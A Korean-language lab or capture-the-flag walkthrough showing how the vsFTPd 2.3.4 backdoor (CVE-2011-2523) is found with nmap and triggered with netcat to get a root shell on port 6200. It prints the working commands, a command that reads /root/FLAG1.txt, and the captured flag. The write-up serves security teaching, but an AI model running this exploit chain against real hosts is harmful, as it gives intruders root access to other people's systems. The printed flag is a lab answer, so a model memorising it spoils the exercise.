
'Portal' 머신에 대한 상세한 침투 테스트 워크스루 및 익스플로잇 보고서로, CVE-2011-2523 (vsFTPd 2.3.4 Backdoor)에 초점을 맞추어 루트 액세스를 달성합니다.
⚠️ 이 프로젝트는 교육 및 승인된 테스트 목적으로만 사용됩니다.
무단 시스템 접근은 엄격히 금지됩니다.
SYAFIQ
역할: 수석 침투 테스터
| 단계 | 도구 | 설명 |
|---|---|---|
| 발견 | Nmap | 네트워크 스캔으로 활성 호스트 탐색 |
| 열거 | Nmap | 서비스 및 버전 식별 |
| 분석 | NSE Script | 알려진 취약점 탐지 |
| 익스플로잇 | Netcat | 백도어 트리거 |
| 사후 익스플로잇 | 터미널 | 루트 접근 권한 획득 및 플래그 검색 |
네트워크에서 활성 호스트 스캔:
nmap -sn --unprivileged 10.150.150.10-30
✅ 결과:
-8개 호스트 탐지됨 -대상 식별됨: 10.150.150.12
열린 포트 및 서비스 스캔:
nmap -Pn -F --unprivileged -sV 10.150.150.12
✅ 발견 사항:
-포트 21 → FTP (vsftpd) -포트 22 → SSH (OpenSSH 8.2p1)
알려진 FTP 백도어 취약점 확인:
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12
🚨 결과:
-대상 취약 상태 -CVE-2011-2523 확인됨
악성 사용자 이름을 사용하여 백도어 트리거:
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21
⚡ 이는 포트 6200에 숨겨진 루트 셸을 엽니다.
백도어에 연결하고 명령 실행:
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200
-루트 접근 권한 획득 -uid=0(root) 확인됨
🏁 플래그 획득:
5ee499eb5d0b8e4269b13483e57adaa0b3815f48
-항상 오래된 서비스 업데이트 (vsFTPd는 취약함) -잘못 구성된 서비스는 전체 시스템 손상으로 이어질 수 있음 -간단한 스캔으로 치명적인 취약점을 발견할 수 있음 -🛡️ 권장 사항 -🔄 FTP 서비스를 최신 버전으로 업데이트 -🚫 불필요한 서비스 비활성화 -🔐 방화벽을 사용하여 접근 제한 -📊 정기적인 보안 감사 수행 -📚 면책 조항
-사이버 보안 학습 -윤리적 해킹 실습 -승인된 침투 테스트
❌ 이 지식을 불법 활동에 사용하지 마십시오.
“보안은 제품이 아니라 과정입니다.” — 항상 테스트하고, 모니터링하고, 개선하십시오.